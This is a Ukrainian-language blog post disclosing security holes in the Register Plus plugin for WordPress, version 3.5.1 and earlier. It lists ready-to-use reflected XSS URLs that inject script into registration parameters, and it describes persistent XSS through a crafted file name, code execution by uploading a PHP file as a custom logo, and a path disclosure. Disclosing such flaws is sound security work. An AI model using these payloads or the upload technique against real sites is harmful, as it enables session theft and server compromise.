Нові уразливості в Register Plus для WordPress

17:16 26.01.2012

06.12.2011

Нещодавно, 25.11.2011, коли я виявив нові уразливості в Register Plus Redux, я також знайшов нові уразливості в плагіні Register Plus для WordPress. Це Cross-Site Scripting, Code Execution та Full path disclosure уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Register Plus для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

26.01.2012

XSS:

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&firstname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&lastname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&website=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&yahoo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&jabber=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&about=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&regcode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі ті параметри, що і при POST запиті. Про які я розповідав раніше.

XSS (persistent):

Вказавши XSS код в якості імені файла (наприклад, можна створити такий файл на Linux та Unix системах) та завантаживши його, код викнається на сторінках http://site/wp-admin/options-general.php?page=register-plus та http://site/wp-login.php?action=register.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution (в полі Custom Logo) через аплоадінг файла з довільний розширенням (наприклад, PHP). Для атаки можна просто завантажити 1.php (на відміну від Register Plus Redux, де це неможливо і потрібно використовувати обхідні техніки). Це пов’язано з тим, що використовується власний аплоадер, а не вбудований в WordPress.

Full path disclosure:

При включеній опції плагіна “Enable Invitation Tracking Dashboard Widget” на сторінці http://site/wp-admin/index.php виводиться повний шлях на сервері.

Уразливі Register Plus 3.5.1 та попередні версії. Враховуючи, що даний плагін більше не підтримується розробником, то його користувачам потрібно виправити дірки власноруч. Або оновити цей плагін до версії Register Plus Redux з виправленими уразливостями.


Leave a Reply

You must be logged in to post a comment.